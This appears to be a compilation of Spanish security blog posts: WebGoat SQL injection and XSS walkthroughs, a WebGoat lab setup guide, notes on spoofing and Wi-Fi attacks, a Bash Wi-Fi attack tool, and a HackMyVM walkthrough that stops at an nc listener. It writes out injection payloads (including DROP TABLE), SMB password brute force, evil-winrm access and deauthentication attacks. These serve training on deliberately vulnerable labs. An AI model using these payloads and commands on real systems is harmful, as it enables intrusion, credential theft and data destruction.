En este artículo veremos cómo resolver los ejercicios SQL Injection Advanced del apartados A3 de Webgoat de forma rápida y fácil

Ejercicio 3

En este ejercicio tendremos que conseguir los datos de una tabla sin permisos usando otra tabla con permisos

Empezaremos con un ‘or 1=1 –

;SELECT * FROM users_data where last_name= 'or 1=1; select * from user_system_data;--

Ejercicio 5

En este ejercicio tendremos que detectar el campo vulnerable, en este caso es el apartado de username.

Si miramos las pistas vemos que nos dice que podemos utilizar el

  tom' AND substring(password,1,1)='a 

Si se investiga un poco vemos que es SQL Blind así que tendremos que aplicar la sentencia SQL probando letras ya que una letra correcta podría dar una respuesta diferente

Para poder agilizar este proceso usaremos Burp Asumiré que ya saben cómo se utiliza Burp ya que es algo esencial y básico

Lo que haremos será interceptar la petición y mandarlo al Intruder creando una variable a la letra que hemos introducido en la consulta tom’ AND substring(password,1,1)=’a y lanzar un ataque de fuerza bruta fijándonos en el length de la respuesta (Esto solo aplicará al primer carácter de la contraseña, para cambiar al carácter 2 tendremos que cambiar el número que apunta la flecha azul)

Una vez tenemos la contraseña debería verse algo así

Finalización

Espero que hayan aprendido mucho y que esta explicación les haya servido para entender mejor cómo funcionan las SQL injection. Muchas gracias por leer el artículo, y no olviden seguirme en Github 0x832 además iré subiendo resoluciones de máquinas de HTB, TryHackMe y más herramientas que vaya desarrollando.

En este artículo veremos cómo resolver los ejercicios XSS del apartado A3 de Webgoat de forma rápida y fácil

Teoria

¿Qué es XSS?

Cross-Site Scripting (también conocido como XSS) es una vulnerabilidad/falla que combina la aceptación de etiquetas HTML/script como entrada que se procesan en un navegador sin codificación ni sanitización Cross-Site Scripting (XSS) es el problema de seguridad de aplicaciones web más frecuente y pernicioso

Si bien existe una defensa sencilla y conocida para este ataque, aún existen muchos casos en la web. La cobertura de las soluciones también suele ser un problema. Hablaremos más sobre esta defensa en breve

Ejercicio 2

En este ejercicio tendremos que ir a la consola del navegador y mandar la petición (Muy fácil)

Ejercicio 7

En este apartado miraremos los campos disponibles averiguando qué campos son vulnerables o no

Después de un rato probando vemos que el campo la tarjeta de crédito es vulnerable

`<script>alert(“XSS Test")</script>'

Ejercicio 10

En el ejercicio 10 trata de XSS DOM, este XSS consiste en manipulando el DOM (Document Object Model). A diferencia del XSS clásico, el servidor no modifica la respuesta Todo ocurre del lado del cliente mediante JavaScript.

Nos meteremos en inspeccionar ya que este trata de buscar ficheros js, si miramos las pistas vemos que tenemos que buscar el GoatRoute.js

Dentro de ese archivo en el código vemos test… si miramos bien el código entendemos que donde pone ‘test/:param’: testRoute quiere decir que cualquier url que tenga el patrón test/param activará testRoute

Esto se puede verificar con

Una vez verificado que es vulnerable ya tendremos la ruta que es WebGoat/start.mvc#test

Ejercicio 11

Una vez encontrada la vulnerabilidad de antes usaremos el webgoat.customjs.phoneHome() para realizar la actividad 11

Tendremos que urlencodear el webgoat.customjs.phoneHome() con Burrp

<script>webgoat.customjs.phoneHome()<%2Fscript>

Una vez hecho lo pondremos en la url y tendremos que ver una respuesta como esta

Para luego mirar la consola y encontrar el número

Esta respuesta significa que JavaScript ejecutó la función que informa el progreso de su tarea al backend de WebGoat. Básicamente webgoat.customjs.phoneHome hara que en la consola nos aparezca un número aleatorio que tendremos que colocar en la respuesta.

Ejercicio 3 de Cross-Site Scripting (Storage)

En esta práctica consiste en XSS almacenado lo cual implica poder almacenar JavaScript como una carga útil con el webgoat.customjs.phoneHome para resolver este problema básicamente lanzaremos el en el chat

<script>webgoat.customjs.phoneHome()</script>

Una vez se publica el código java en la consola obtendremos la respuesta

Finalización

Espero que hayan aprendido mucho y que esta explicación les haya servido para entender mejor cómo funcionan las XSS. Muchas gracias por leer el artículo, y no olviden seguirme en Github 0x832 además iré subiendo resoluciones de máquinas de HTB, TryHackMe y más herramientas que vaya desarrollando.

En este artículo veremos cómo resolver la introducción de sql injection del apartado A3 de Webgoat de forma rápida y fácil

SQL Injection(Intro)

SQL es un lenguaje de programación estandarizado (ANSI en 1986, ISO en 1987) que se utiliza para gestionar bases de datos relacionales y realizar diversas operaciones sobre los datos que contienen.

Una base de datos es una colección de datos. Estos se organizan en filas, columnas y tablas, y se indexan para facilitar la búsqueda de información relevante.

Ejercicio 2

Para resolver este Ejercicio simplemente tenemos que hacer una consulta a la tabla Employees para seleccionar el departamento

SELECT department FROM employees WHERE first_name = 'Bob'

Ejercicio 3

Para resolver este Ejercicio simplemente tenemos que cambiar el departamento de Tobi Barnett a Ventas

UPDATE employees SET department = 'Sales' WHERE first_name = 'Tobi';

Ejercicio 4

Para resolver este Ejercicio simplemente tenemos que añadir el campo phone en la tabla employees. Como podemos ver, los ejercicios consisten en consultas SQL para acostumbrarnos a la dinámica

ALTER TABLE employees ADD COLUMN phone VARCHAR(20);

Ejercicio 5

Para resolver este Ejercicio simplemente tenemos que dar permisos al usuario authorized_user a la tabla grant_rights

GRANT SELECT ON grant_rights TO authorized_user;

Ejercicio 9

Una vez hemos realizado las primeras sentencias SQL tocará practicar cómo hacer SQL Injection

Para ver cuál tiene una respuesta que llame la atención

Cuando en el formulario escribimos smith’ OR ‘1’=’1 lo que hacemos es romper la consulta SQL original y agregar una condición que siempre es verdadera.

Lo que quiere decir esto es que la consulta normal sería algo cómo

SELECT * FROM user_data 
WHERE first_name='John' AND last_name='smith';

Pero con la inyección sería algo cómo

SELECT * FROM user_data 
WHERE first_name='John' AND last_name='smith' OR '1'='1';

La parte ‘1’=’1’ siempre es verdadera, por lo tanto, la condición del WHERE se vuelve verdadera para todos los registros y la base de datos devuelve todas las filas, aunque el apellido no sea smith

Ejercicio 10

En este punto tendrémos que detectar qué entrada es vulnerable a un SQL Injection

Para descubrir el campo vulnerable simplemente tendrémos que poner 1=’1’ en uno de los dos campos para ver cual tiene una respuesta que llame la atención

Una vez detectamos el campo vulnerable lanzaremos el ataque

0 OR 1234=1234

El OR 1 = 1 es una condición que siempre será verdadera, ya que 1 siempre es igual a 1. Esto significa que, sin importar lo que esté en el resto de la consulta, la consulta siempre devolverá todos los registros.

Ejercicio 11

Tendremos que descubrir el salario de los trabajadores

Para poder realizar este apartado tendremos que hacer como antes, encontrar el campo vulnerable y atacarlo

3SL99A' OR '1' = '1

Ejercicio 12

Aquí tendremos que concatenar consultas para modificar el salario

El punto y coma ; separa dos consultas SQL. Lo que pasa es que en muchas aplicaciones vulnerables a inyección SQL, no se valida correctamente la entrada del usuario. Esto permite que el atacante ejecute múltiples consultas SQL en una sola ejecución

' OR 1=1; UPDATE employees SET SALARY = 99999 WHERE FIRST_NAME = 'John'; --

Ejercicio 13

En esta práctica aplicaremos una consulta SQL para borrar una tabla; si leemos la práctica, nos pide que borremos la tabla access_logs

'; DROP TABLE access_log; --

Finalización

Espero que hayan aprendido mucho y que esta explicación les haya servido para entender mejor cómo funcionan las SQL injection. Muchas gracias por leer el artículo, y no olviden seguirme en Github 0x832 además iré subiendo resoluciones de máquinas de HTB, TryHackMe y más herramientas que vaya desarrollando.

Hola a todos. Hoy les presentaré un artículo en el que explicaré cómo crear un subsistema Ubuntu en Windows (WSL) para preparar un entorno de pruebas con WebGoat. Una vez configurado el entorno, también veremos cómo automatizar el servicio para que se inicie automáticamente al acceder al subsistema

Instalación del volumen

• Para empezar, abriremos PowerShell y escribiremos este comando para instalar el subsistema de Ubuntu

    PS C:\WINDOWS\> wsl --install -d Ubuntu --name Ubuntu_webgoat
    Descargando: Ubuntu
    Instalando: Ubuntu
    Distribución instalada correctamente. Se puede iniciar a través de "wsl.exe -d Ubuntu_webgoat"
    Iniciando Ubuntu_webgoat...
    Provisioning the new WSL instance Ubuntu_webgoat
    This might take a while...
    Create a default Unix user account: webgoat
    New password:
    Retype new password:
    passwd: password updated successfully
    To run a command as administrator (user "root"), use "sudo <command>".
    See "man sudo_root" for details.
  
    webgoat@user:~$ whoami
    webgoat
  

  Una vez instalado, actualizaremos el sistema e instalaremos Docker y esto

    root@user:/home/webgoat# sudo apt update && sudo apt upgrade -y
    Get:1 http://security.ubuntu.com/ubuntu noble-security InRelease [126 kB]
    Hit:2 http://archive.ubuntu.com/ubuntu noble InRelease
    Get:3 http://security.ubuntu.com/ubuntu noble-security/main amd64 Packages [1349 kB]
    Get:4 http://archive.ubuntu.com/ubuntu noble-updates InRelease [126 kB]  
    ...  
  

    root@user:/home/webgoat# sudo apt install -y docker.io
    Reading package lists... Done
    Building dependency tree... Done
    Reading state information... Done
    The following package was automatically installed and is no longer required:
      libllvm19
    Use 'sudo apt autoremove' to remove it.
    The following additional packages will be installed:
      bridge-utils containerd dns-root-data dnsmasq-base iptables libip4tc2 libip6tc2 libnetfilter-conntrack3
  
  

  Activaremos el servicio Docker para que se inicie nada más iniciar Ubuntu

  root@user:/home/webgoat# sudo systemctl enable --now docker
  

  Creación del servicio webgoat

  Para poder crear el servicio, generaremos un fichero llamado webgoat.service en /etc/systemd/system/webgoat.service

    [Unit]
    Description=WebGoat Docker Service
    After=docker.service
    Requires=docker.service
  
    [Service]
    Restart=always
    ExecStart=/usr/bin/docker run --rm \
      -p 8080:8080 \
      -e TZ=Europe/Madrid \
      --name webgoat \
      webgoat/webgoat:latest
    ExecStop=/usr/bin/docker stop webgoat
  
    [Install]
    WantedBy=multi-user.target
  

  Una vez creado, activaremos el deamon y el nuevo servicio webgoat

  
    root@userr:/home/webgoat# sudo systemctl daemon-reload
    root@userr:/home/webgoat# sudo systemctl enable --now webgoat
    Created symlink /etc/systemd/system/multi-user.target.wants/webgoat.service → /etc/systemd/system/webgoat.service.
    root@userr:/home/webgoat#
  

  Y verificaremos que se ha ejecutado sin ningún problema con sudo systemctl status webgoat

    root@user:/home/webgoat# sudo systemctl status webgoat
    ● webgoat.service - WebGoat Docker Service
        Loaded: loaded (/etc/systemd/system/webgoat.service; enabled; preset: enabled)
        Active: active (running) since Sun 2025-12-07 20:20:20 CET; 1min 26s ago
      Main PID: 4819 (docker)
          Tasks: 9 (limit: 18605)
        Memory: 9.0M (peak: 9.5M)
            CPU: 92ms
        CGroup: /system.slice/webgoat.service
                └─4819 /usr/bin/docker run --rm -p 8080:8080 -e TZ=Europe/Madrid --name webgoat webgoat/webgoat:latest
  
  

Instalación de nginx

Para poder cargar automáticamente el servicio WebGoat, tendremos que instalar Nginx

  root@user:/home/webgoat# sudo apt install -y nginx
  Hit:1 http://security.ubuntu.com/ubuntu noble-security InRelease
  Hit:2 http://archive.ubuntu.com/ubuntu noble InRelease
  Hit:3 http://archive.ubuntu.com/ubuntu noble-updates InRelease
  Hit:4 http://archive.ubuntu.com/ubuntu noble-backports InRelease
  ...

Verificaremos que el servicio esté activo

root@user:/home/webgoat# systemctl  enable nginx
Synchronizing state of nginx.service with SysV service script with /usr/lib/systemd/systemd-sysv-install.
Executing: /usr/lib/systemd/systemd-sysv-install enable nginx
root@user:/home/webgoat#


root@user:/home/webgoat# sudo systemctl status nginx
● nginx.service - A high performance web server and a reverse proxy server
     Loaded: loaded (/usr/lib/systemd/system/nginx.service; enabled; preset: enabled)
     Active: active (running) since Sun 2025-12-07 20:20:45 CET; 40s ago
       Docs: man:nginx(8)
    Process: 7515 ExecStartPre=/usr/sbin/nginx -t -q -g daemon on; master_process on; (code=exited, status=0/SUCCESS)
    Process: 7517 ExecStart=/usr/sbin/nginx -g daemon on; master_process on; (code=exited, status=0/SUCCESS)
   Main PID: 7559 (nginx)
      Tasks: 17 (limit: 18605)

Crearemos el fichero entorno.prueba

Se creará el fichero en /etc/nginx/sites-available/entorno.prueba

  # Redirigir cualquier petición por IP al dominio
  server {
      listen 80;
      server_name _;  # captura cualquier host no definido

      return 301 http://entorno.prueba$request_uri;
  }

  # Configuración principal del dominio
  server {
      listen 80;
      server_name entorno.prueba www.entorno.prueba;

      location / {
          proxy_pass http://127.0.0.1:8080/WebGoat/;
          proxy_set_header Host $host;
          proxy_set_header X-Real-IP $remote_addr;
          proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
      }
  }

Crear enlace simbólico, esto activara la configuración del sitio entorno.prueba. Una vez realizado esto recargaremos Nginx para aplicar los cambios

  root@user:/home/webgoat# sudo ln -s /etc/nginx/sites-available/entorno.prueba /etc/nginx/sites-enabled/
 /etc/nginx/sites-enabled/
  root@user:/home/webgoat# sudo nginx -t
  2025/12/07 13:09:52 [warn] 8728#8728: conflicting server name "_" on 0.0.0.0:80, ignored
  nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
  nginx: configuration file /etc/nginx/nginx.conf test is successful
  root@user:/home/webgoat#

  root@user:/home/webgoat# sudo systemctl reload nginx
  root@user:/home/webgoat#

En nuestro /etc/hosts tendremos que hacer que la IP resuelva al dominio

  127.0.0.1   entorno.prueba

Y en Windows tendremos que ir a C:\Windows\System32\drivers\etc\hosts y redirigir la IP al dominio

  127.0.0.1    entorno.prueba

Acceso al entorno de prueba Webgoat

Una vez realizados todos los pasos, si accedemos a http://entorno.prueba:8080/WebGoat/login, deberíamos poder ver algo como la imagen

Finalización

Espero que hayan aprendido mucho haciendo entorno vulnerable y les haya servido de ayuda mi explicación. Muchas gracias por leer el artículo y no olviden seguirme en GitHub, ya que también iré subiendo herramientas de hacking.

Introducción

En este artículo veremos cómo funcionan los ataques basados en ARP Spoofing e IP Spoofing, técnicas de explotación y cómo protegernos. Además, abalremos sobre los protocolos Wi-Fi como TKIP vs AES y herramientas como aircrack-ng

• Qué es ARP Spoofing
• Qué es IP Spoofing y cómo se usa en DoS/DDos
• Diferencias entre TKIP y AES en seguridad Wi-Fi
• Herramientas prácticas para auditoría inalámbrica
  

ARP Spoofing

El ARP Spoofing consiste en engañar a la red asociando direcciones IP con MAC falsas.

Objetivo: Modificar la IP ↔ MAC para interceptar tráfico en una LAN.

Características importantes

• Afecta a Capa 2 (MAC) y Capa 3 (IP)
• ARP no autentica respuestas
• Cualquier ARP Reply puede almacenarse en caché
• Permite ataques Man-in-the-Middle, DoS o sniffing

Ejemplo de escenario:

Víctima → (Cree que la MAC del atacante es la puerta de enlace)

Herramientas

IP Spoofing

El IP Spoofing consiste en falsificar la dirección IP de origen en los paquetes enviados, simulando que provienen de una máquina diferente.

Objetivos

• Ocultar identidad del atacante
• Realizar ataques DoS y DDoS
• Facilitar ataques MITM en entornos sin control estricto

Se aplica en:

• Capa 3 – Protocolo IP
• No se valida origen

Cómo protegernos

Rate Limiting

Limitar paquetes por IP para evitar saturación:

Prevenir DDoS y análisis de tráfico

• Configurar el firewall o dispositivo de la red para limitar la cantidad de paquetes entrrantes por segundo de una IP

Seguridad Wi-Fi: TKIP vs AES

TKIP (Temporal Key Integrity Protocol)

• Introducido como sustitución temporal de WEP
• Hoy en día es inseguro

AES (Advanced Encryption Standard)

• Algoritmo moderno de cifrado
• Base de WPA2 y WPA3
• Mucho más seguro que el TKIP

Herramientas Wi-Fi (Aircrack-ng)

Hasta aquí llega nuestro artículo explicativo sobre cómo crear Command&control.

Espero que les haya servido la explicación y que haya sido clara. No olviden seguirme en GitHub, ya que iré subiendo más artículos sobre ciberseguridad.

Introducción

Hoy presentaré el análisis de una herramienta que desarrollé en Bash para automatizar tareas de auditoría Wi-Fi con airmon-ng, macchanger, john y cowpatty. Explicaré de forma breve cómo funciona esta herramienta y sus funciones

Este script reúne y automatiza herramientas como:

• airmon-ng → Activar modo monitor.
• airodump-ng → Captura de tráfico.
• aireplay-ng → Pruebas de desautenticación.
• macchanger → Cambio de MAC.
• tshark → Análisis de tráfico DNS/HTTP.
• airdecap-ng → Descifrado de capturas WPA/WPA2.
• cowpatty / genpmk / john / aircrack-ng → Ataques de diccionario sobre handshakes.

Aviso ético: Todo lo que se explica debe realizarse exclusivamente en entornos controlados (laboratorios, CTFs) y con autorización. El objetivo es aprender cómo funcionan estas técnicas, no aplicarlas de forma indebida.

Reconocimiento del Script

Estructura general del programa:

• Menú interactivo con opciones numeradas.
• Comprobación de privilegios (root()).
• Funciones modulares para cada tarea (activar modo monitor, escaneo, análisis, etc.).
• Automatización de comandos complejos para reducir errores.

El flujo principal está en la función main(), que coordina la ejecución según la opción elegida.

Funciones Clave y Herramientas Automatizadas

1. root()

Comprueba si el usuario tiene permisos de superusuario (EUID).

• Herramientas como airmon-ng necesitan acceso al hardware.
• Por eso, si no somos root, la herramienta lo solicita.

2. inicio()

Presenta un menú con opciones como:

• Activar modo monitor.
• Escanear redes.
• Ejecutar ataques simulados.
• Analizar capturas.

Automatización:
Gracias a este menú evitamos escribir comandos manualmente y reducimos errores al trabajar.

3. modo_monitor1() y activar_modo_monitor()

Activa el modo monitor en la tarjeta de red mediante airmon-ng.
Opcionalmente permite cambiar la MAC con macchanger.

Concepto de ciberseguridad:

• El modo monitor sirve para capturar tráfico inalámbrico.
• Cambiar la MAC ayuda a mantener anonimato durante pruebas.

4. scan_wifis3() y scan_wifi_en_concreto4()

Automatiza airodump-ng para:

• Escanear todas las redes cercanas.
• Capturar tráfico de una red concreta (BSSID/ESSID + canal).

5. Ataque_Beacon_Flood5()

Genera múltiples AP falsos con mdk3.

Objetivo:

• Analizar ataques de denegación de servicio en Wi-Fi.
• Sobrecargar el canal hasta provocar saturación en las redes del entorno.

6. expultar_a_la_gente6()

Simula desautenticación mediante aireplay-ng.

Esta función permite expulsar temporalmente a usuarios de una red para capturar el handshake.

7. brutal_force7()

Integra varias herramientas:

• aircrack-ng, john, cowpatty, genpmk.

Propósito:

• Auditar contraseñas débiles en entornos controlados.

8. analisi_De_captura()

Descifra tráfico con airdecap-ng y analiza DNS/HTTP con tshark.

Permite evaluar riesgos en redes con cifrado débil o mal configurado.

Herramientas Automatizadas y su Rol

Buenas prácticas y defensa

• WPA3 y contraseñas robustas.
• Deshabilitar WPS.
• Implementar IDS/IPS para redes inalámbricas.
• Cifrado DNS y uso estricto de HTTPS.

Finalización

Espero que hayan aprendido mucho y que esta explicación les haya servido para entender mejor cómo se puede comprometer una red Wi-Fi en un entorno controlado. Muchas gracias por leer el artículo, y no olviden seguirme en Github. no obstante si quieren descargar mi tool les dejó aquí el acceso directo evil-intruder: además iré subiendo resoluciones de máquinas de HTB, TryHackMe y más herramientas que vaya desarrollando.

Hola a todos, hoy les presentaré la resolución de una máquina HackMyVM de dificultad Easy. En esta máquina aprenderemos a enumerar y explotar el servicio SMB, y también a utilizar WinRM para obtener acceso remoto en el sistema Windows, una vez que tengamos las credenciales correctas.

Reconocimiento de la Red Local

El primer paso será enumerar los dispositivos de la red para encontrar la máquina vulnerable.

En este caso usaremos arp-scan con -I especificaremos la interfaz que queremos escanear y con el ignoredups ignoraremos las entradas duplicadas . Tambien con 2>/dev/null mandaremos los errores al /dev/null para que no sean visibles en la terminal. Por ultimo filtraremos por la mac que tenga 08:00:27 ya que este tipo de MAC son de la interfaz de red utilizadas por máquinas virtuales.

  ┌──(root㉿kali)-[/home/user]
  └─# arp-scan -I eth2 --localnet --ignoredups 2>/dev/null | grep '08:00:27'      

  Interface: eth2, type: EN10MB, MAC: 08:00:27:db:40:5e, IPv4: 192.168.56.101
  192.168.56.100  08:00:27:5d:05:f2       (Unknown)
  192.168.56.102  08:00:27:53:f6:85       (Unknown)

Reconocimiento

• Enumeración con nmap Hacemos un nmap simple para ver los puertos que corren en la máquina

      #nmap -p- -sS --min-rate 5000 -T5 -Pn -vvv -oN ports.txt 192.168.56.102
      Warning: 192.168.56.102 giving up on port because retransmission cap hit (2).
      Increasing send delay for 192.168.56.102 from 0 to 5 due to 10452 out of 26129 dropped probes since last increase.
      Nmap scan report for 192.168.56.102
      Host is up, received arp-response (0.0018s latency).
      Scanned at 2025-04-13 13:34:49 CEST for 30s
      Not shown: 60297 closed tcp ports (reset), 5226 filtered tcp ports (no-response)
      PORT      STATE SERVICE      REASON
      80/tcp    open  http         syn-ack ttl 128
      135/tcp   open  msrpc        syn-ack ttl 128
      139/tcp   open  netbios-ssn  syn-ack ttl 128
      445/tcp   open  microsoft-ds syn-ack ttl 128
      5985/tcp  open  wsman        syn-ack ttl 128
      47001/tcp open  winrm        syn-ack ttl 128
      49664/tcp open  unknown      syn-ack ttl 128
      49665/tcp open  unknown      syn-ack ttl 128
      49666/tcp open  unknown      syn-ack ttl 128
      49667/tcp open  unknown      syn-ack ttl 128
      49668/tcp open  unknown      syn-ack ttl 128
      49671/tcp open  unknown      syn-ack ttl 128
      MAC Address: 08:00:27:53:F6:85 (Oracle VirtualBox virtual NIC)
  
      Read data files from: /usr/bin/../share/nmap
  

  En este caso podemos ver bastantes puertos , pero los que más nos llaman la atención son el

      80	HTTP	Servicio web
      135	MSRPC	Llamadas remotas
      139	NetBIOS Servicio de sesiones
      445	SMB	Compartición de archivos
      5985	WinRM	PowerShell remoto vía HTTP
      47001	WinRM (HTTPS)	PowerShell remoto vía HTTPS
  

Ahora accedemos a la web para poder determinar qué tipo de vulnerabilidades podemos encontrar

Vemos que hay algo que nos llama la atención nica (un usuario)

Reconocimiento SMB

Ya que tenemos el SMB habilitado podemos intentar hacer un ataque de fuerza bruta en el servidor SMB ya que tenemos un usuario posiblemente valido

Primero haremos un reconocimiento para ver a qué nos enfrentamos

    ┌──(root㉿kali)-[/home/user]
    └─# creackmapexec smb 192.168.56.102
      SMB   192.168.56.102  445    WIN-IURF14RBVGV  [*] Windows 10 / Server 2019 Build 17763 x64 (name:WIN-IURF14RBVGV) (domain:WIN-IURF14RBVGV) (signing:False) (SMBv1:False)

Podemos observar cosas bastante interesantes como:

WIN-IURF14RBVGV Nombre del host de la máquina (NetBIOS name).

(domain:WIN-IURF14RBVGV) No pertenece a un dominio externo, solo a su propio grupo de trabajo.

(signing:false) La firma de paquetes SMB está desactivada, lo cual nos permite hacer, Fuerza bruta, Pass-the-Hash…

Intento de session nula SMB

Podríamos intentar listar recursos con una sesión nula

    ┌──(root㉿kali)-[/home/user]
    └─# crackmapexec smb 192.168.56.102 -u null -p '' --shares
      SMB   192.168.56.102  445    WIN-IURF14RBVGV  [*] Windows 10 / Server 2019 Build 17763 x64 (name:WIN-IURF14RBVGV) (domain:WIN-IURF14RBVGV) (signing:False) (SMBv1:False)

    SMB   192.168.56.102  445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\null: STATUS_LOGON_FAILURE

Por lo que podemos observar, listar recusos con session nula no deja

Fuerza bruta al recurso SMB con el usuario “nica”

Una vez hecho esto , intentaremos hacer un ataque de fuerza bruta al recurso SMB con el usuario encontrado anteriormente nica

  ┌──(root㉿kali)-[/home/user]
  └─# crackmapexec smb 192.168.56.102 -u nica -p /usr/share/wordlists/rockyou.txt
    SMB         192.168.56.102  445    WIN-IURF14RBVGV  [*] Windows 10 / Server 2019 Build 17763 x64 (name:WIN-IURF14RBVGV) (domain:WIN-IURF14RBVGV) (signing:False) (SMBv1:False)
    SMB   192.168.56.102  445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\nica:123456 STATUS_LOGON_FAILURE
    SMB   192.168.56.102  445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\nica:12345 STATUS_LOGON_FAILURE
    SMB   192.168.56.102  445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\nica:123456789 STATUS_LOGON_FAILURE
    SMB   192.168.56.102  445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\nica:password STATUS_LOGON_FAILURE
    SMB   192.168.56.102  445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\nica:realizar STATUS_LOGON_FAILURE
    SMB   192.168.56.102  445    WIN-IURF14RBVGV  [+] WIN-IURF14RBVGV\nica:h****

Hemos obtenido la contraseña h***** despues de realizar el ataque de fuerza brut !

Recursos compartidos

    ┌──(root㉿kali)-[/home/user]
    └─$ crackmapexec smb 192.168.56.102 -u nica -p hardcore --shares
    SMB         192.168.56.102   445    WIN-IURF14RBVGV  [*] Windows 10 / Server 2019 Build 17763 x64 (name:WIN-IURF14RBVGV) (domain:WIN-IURF14RBVGV) (signing:False) (SMBv1:False)

    SMB   192.168.56.102   445    WIN-IURF14RBVGV  [+] WIN-IURF14RBVGV\nica:hardcore
    SMB   192.168.56.102   445    WIN-IURF14RBVGV  [+] Enumerated shares
    SMB   192.168.56.102   445    WIN-IURF14RBVGV  Share     Permissions     Remark
    SMB   192.168.56.102   445    WIN-IURF14RBVGV  -----     -----------     ------
    SMB   192.168.56.102   445    WIN-IURF14RBVGV  ADMIN$              Admin remota
    SMB   192.168.56.102   445    WIN-IURF14RBVGV  C$            Recurso predeterminado
    SMB   192.168.56.102   445    WIN-IURF14RBVGV  IPC$            READ            IPC remota

Vemnos que hay varios recursos compartidos

1. ADMIN$: Recurso para administración remota (por defecto, los administradores pueden acceder a él).

2. C$: Recurso predeterminado que da acceso a la unidad C del sistema

3. IPC$: proporciona un mecanismo de comunicación entre procesos (IPC) autenticado .Permite realizar conexiones remotas con otros servicios, pero tiene permisos de solo lectura.

Veremos los recursos compartidos por defecto, por lo que no nos sirve de mucho, pero vamos a probar a conectarnos de forma remota con las credenciales que hemos encontrado, mediante el protocolo WinRM.

WinRM (Windows Remote Management)

    ┌──(root㉿kali)-[/home/user]
    └─$ crackmapexec winrm 192.168.56.102 -u nica -p hardcore
    SMB    192.168.56.102   5985   WIN-IURF14RBVGV  [*] Windows 10 / Server 2019 Build 17763 (name:WIN-IURF14RBVGV) (domain:WIN-IURF14RBVGV)
    HTTP    192.168.56.102   5985   WIN-IURF14RBVGV  [*] http://192.168.56.102:5985/wsman
    WINRM  192.168.56.102   5985   WIN-IURF14RBVGV  [+] WIN-IURF14RBVGV\nica:hardcore (Pwn3d!)

Vemos que ha funccionado! nos sale WIN-IURF14RBVGV\nica:hardcore (Pwn3d!)

(Pwn3d!) → TOTAL. Has autenticado y tienes acceso remoto mediante WinRM.

Una vez hemos verificado que podemos conectarnos accederemos remotamente usando evil-winrm

Evil-winrm

Podemos simplemente conectarnos usando Evil-WinRM y obtener una PowerShell como el usuario nica.

  ┌──(root㉿kali)-[/home/user]
  └─$ evil-winrm -i 192.168.56.102 -u nica -p hardcore

    Evil-WinRM shell v3.7

    Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

    Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

    Info: Establishing connection to remote endpoint
    *Evil-WinRM* PS C:\Users\nica\Documents> whoami
    win-iurf14rbvgv\nica

En este punto podemos leer la primera flag con dicho usuario

  *Evil-WinRM* PS C:\Users\nica> ls

  Directorio: C:\Users\nica

    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    d-r---        9/15/2018   9:12 AM                Desktop
    d-r---        9/26/2023   6:44 PM                Documents
    d-r---        9/15/2018   9:12 AM                Downloads
    d-r---        9/15/2018   9:12 AM                Favorites
    d-r---        9/15/2018   9:12 AM                Links
    d-r---        9/15/2018   9:12 AM                Music
    d-r---        9/15/2018   9:12 AM                Pictures
    d-----        9/15/2018   9:12 AM                Saved Games
    d-r---        9/15/2018   9:12 AM                Videos
    -a----        9/26/2023   6:44 PM             10 user.txt
      
  *Evil-WinRM* PS C:\Users\nica> cat user.txt
   H******

Ahora podemos observar varias cosas, pero en lo que nos centraremos es en que hay un usuario administrador llamado akanksha.

  *Evil-WinRM* PS C:\Users\nica> net users

  Cuentas de usuario de \\

  -------------------------------------------------------------------------------
  Administrador            akanksha                 DefaultAccount
  Invitado                 nica                     WDAGUtilityAccount
  El comando se ha completado con uno o m s errores.

Flag de root

Una vez sabemos que el usuario administrador es akanksha hacemos fueza bruta como antes

 
    ┌──(root㉿kali)-[/home/user]
    └─$ # crackmapexec smb 192.168.56.102 -u akanksha -p /usr/share/wordlists/rockyou.txt
    SMB         192.168.56.102   445    WIN-IURF14RBVGV  [*] Windows 10 / Server 2019 Build 17763 x64 (name:WIN-IURF14RBVGV) (domain:WIN-IURF14RBVGV) (signing:False) (SMBv1:False)
    SMB         192.168.56.102   445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\akanksha:jessica STATUS_LOGON_FAILURE
    SMB         192.168.56.102   445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\akanksha:michelle STATUS_LOGON_FAILURE
    SMB         192.168.56.102   445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\akanksha:tigger STATUS_LOGON_FAILURE
    SMB         192.168.56.102   445    WIN-IURF14RBVGV  [+] WIN-IURF14RBVGV\akanksha:sw****

Ya hemos encontrado la contraseña, pero…

Aunque esta contraseña es válida para el servicio SMB, no lo es para WinRM, así que debemos pensar en otra forma de entrar.

Ya que tenemos una shell, podríamos pensar en usar runas, pero nuestra shell no es interactiva, por lo que podríamos importar el módulo de RunasCs para solucionar ese problema.

Qué es runas?

Es un comando de la línea de sistemas operativos Microsoft Windows que permite a un usuario ejecutar herramientas y programas específicos bajo un nombre de usuario diferente al que utilizó para iniciar sesión en una computadora de forma interactiva

Qué es RunasCs ?

RunasCs es una herramienta escrita en C# que simula el comportamiento de runas, pero:

1. No necesita interacción directa.
2. Puedes pasarle el usuario y la contraseña directamente por línea de comandos.
3. Ejecuta comandos como otro usuario desde la shell remota.

Nos descargamos RunasCs

  
    ┌──(root㉿kali)-[/home/user]
    └─# git clone https://github.com/antonioCoco/RunasCs.git
    Cloning into 'RunasCs'...
    remote: Enumerating objects: 371, done.
    remote: Counting objects: 100% (206/206), done.
    remote: Compressing objects: 100% (108/108), done.
    remote: Total 371 (delta 131), reused 145 (delta 98), pack-reused 165 (from 1)
    Receiving objects: 100% (371/371), 331.19 KiB | 36.00 KiB/s, done.
    Resolving deltas: 100% (231/231), done.
  

Una vez finalizada la instalación del repositorio, nos conectaremos como el usuario nica e importaremos RunasCs

Pero antes, nos pondremos en escucha en el puerto 4444:

      ┌──(root㉿kali)-[/home/user]
      └─# nc -nlvp 4444
      listening on [any] 4444 ...

Ahora ya podemos conectarnos como el usuario nica

